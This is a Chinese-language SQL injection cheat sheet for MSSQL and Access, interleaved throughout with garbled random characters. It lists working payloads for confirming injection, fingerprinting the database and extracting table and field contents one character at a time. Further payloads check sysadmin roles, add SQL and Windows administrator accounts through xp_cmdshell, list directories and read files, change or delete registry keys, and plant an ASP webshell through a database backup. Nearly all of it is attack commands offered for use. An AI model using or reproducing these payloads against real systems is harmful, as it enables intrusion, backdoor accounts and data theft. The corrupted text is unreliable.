1.判断是否有注入;and 1=1 ;and 1=2 ir��g��%�n
2.初步判断是否是mssql ;and user>0 I�/F�3�%'O
Ia�DN[:SX�
3.注入参数是字符'and [查询条件] and ''=' ;>#�YOxPl�
Re`'�dd�e=
4.搜索时没过滤参数的'and [查询条件] and '%25'=' l]pHj4`u�v
"YUh4uZ~P�
5.判断数据库系统 6Dx^$=Sa$
!KYX\H��RW
;and (select count(*) from sysobjects)>0 mssql f�u}ZOP�u
!N, �O��e<
;and (select count(*) from msysobjects)>0 access h[�%t7qo=�
*G�]zN�"Y�
�K6�C@YY(�
rD7�L==Ld
6.猜数据库 ;and (select Count(*) from [数据库名])>0 F_Pv\?�35z
��D7|�=e�v
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ENm�fbJ4d~
_[eAA4�h �
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ���3,x�|w
z�cn�> 4E)
9.(1)猜字段的ascii值(access) !!jit�FHzb
@U~i�<�kt�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Q��xw?D4/Y
~O�gtgr���
(2)猜字段的ascii值(mssql) >�4c�7r~\k
YlF<S49loC
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 }ZP;kM$��g
=�vq�y�5�y
10.测试权限结构(mssql) ���m1](f[$
n0/H2>I��[
~E]��ct F
0��`{��3|g
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- R:Pw@����
"ggViIOw�&
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j�bDap� i<
X �{��["4
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \.�@f�A�gv
@x�O?SjH�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
PT`];C(he
C4T�n���
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- %[l*���:05
�iyj,0���T
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /b44;U`v5-
nB�VR)|+�M
;and 1=(select IS_MEMBER('db_owner'));-- k|O?�qE1hP
6m=FWw3��y
?�iX1;c��9
d]kP@flOV�
11.添加mssql和系统的帐户 ��x_C#ALq9
#�/U��lW�
;exec master.dbo.sp_addlogin username;-- zF��%'~S0{
;exec master.dbo.sp_password null,username,password;-- ���c*5y8k�
NI�@�$"���
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- i�?*_-NA�m
SkmL�X�@:(
;exec master.dbo.xp_cmdshell 'net user username password H�y�?+p{{G
s�S�h=Idrx
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fs43\m4=�m
fn!(cE|`E�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- (Wj2%*N�T�
|L@9�q�w�F
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- d�zK]�F/L]
X5(S�+;v"^
��s+=JT+g�
\Y� EV
�5
12.(1)遍历目录 �w6^X�*t�E
�L>,j*a_[�
;create table dirs(paths varchar(100), id int) __FhuP� �P
�oX�2J�2O�
;insert dirs exec master.dbo.xp_dirtree 'c:\' :3�F��J��e
[i8,r��Oa7
;and (select top 1 paths from dirs)>0 C��*S�%�aR
<h�Yr�cO�t
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �r N"�P
IH
i$Rlb5RU��
�5M.�KF;P
c:a5p�d7T
(2)遍历目录 S`!M�oIMsD
!'�-|]xx(�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :+Pl~�X"�_
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 @.4e^���Km
7�_AR(�)CM
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |;L%hIR[
0(u��NFyIG
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 m�� &U
$�V
6.%V"�l� �
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 2n9E:t�c��
)u. ut8![T
`=]I�-5#.W
P5:�X7[���
13.mssql中的存储过程 ,W�'�?F9Y\
. PzlhTL�7
xp_regenumvalues 注册表根键, 子键 �&DqeO8�?Q
�VTD�p9�s�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 =�Yxu {]G�
/r4��Q�Dwu
xp_regread 根键,子键,键值名 (�z�[|�\6O
�J�y,�Dc�l
;exec xp_regread 7����VP[U,
Lv��;�R8^n
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 "T�W�Ni�t�
t�^�|+�|>S
xp_regwrite 根键,子键, 值名, 值类型, 值 �� c`'��2
lgx�G:zAC
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0F�Df�B;��
Q�%xvS,�oI
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 :��S���h>
^�J�DiI7��
xp_regdeletevalue 根键,子键,值名
+["t@Q4IQ
p�g}9ba�W?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 GC{)3)�_ t
���e3�+'m
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 zh �hH�A9�
�{9� >jWNx
))�M; .b.D
[:HT��=LX3
14.mssql的backup创建webshell �[Z3B�~c��
�9�(%ptnya
use model 2:(h17So�
7Y:��~'&U|
create table cmd(str image); �y<|vcg�8x
|%F[.9Dp��
insert into cmd(str) values (''); }g�E?�ms4$
! H)D@,@�&
backup database model to disk='c:\l.asp'; �wv��AXt*R
Td���&��w
LB<,(�d�yh
�*$ZLu jy7
15.mssql内置函数 d7x����d"�
x,�Im%!h��
;and (select @@version)>0 获得Windows的版本号 �4\%0a�,\^
+��L4���_]
;and user_name()='dbo' 判断当前系统的连接用户是不是sa VP4W~;UV|\
k�axA�Ik8l
;and (select user_name())>0 爆当前系统的连接用户 pN�+��lC[C
?#F}mOVAa�
;and (select db_name())>0 得到当前连接的数据库 8oI��)q4�V
�,+0���>�p
Z8�\c�'xN
sR`WV6��!9
16.简洁的webshell �Xa�.��_�
kL�K��d
O0
use model lNS�B �"�S
�em�@\S�
create table cmd(str image); lY5a=mwH�U
�I!y[7��^R
insert into cmd(str) values (''); u$�c)B<.UR
s�a%2,e��'
backup database model to disk='g:\wwwtest\l.asp';
